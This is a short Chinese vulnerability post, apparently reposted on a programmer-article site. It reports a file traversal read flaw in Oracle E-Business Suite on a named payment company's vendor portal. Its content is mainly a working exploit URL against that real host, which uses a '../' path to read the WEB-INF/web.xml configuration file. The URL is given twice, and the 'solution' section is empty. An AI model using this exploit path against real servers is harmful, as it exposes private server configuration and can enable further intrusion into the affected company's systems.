欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例)

程序员文章站 2022-03-16 11:49:03
RT 地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../W...

RT

地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml

利用为oracle ebs系统通用漏洞

读取WEB.XML文件

 

通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例)

 

地址:http://vendor.allinpay.com//OA_HTML/help/topics/iHelp/HelpServlet/US/po/OA_HTML/cabo/../WEB-INF/web.xml

利用为oracle ebs系统通用漏洞。

读取WEB.XML文件

 

通联支付某处文件遍历读取漏洞(Oracle ebs系统通用漏洞案例)

 

解决方案: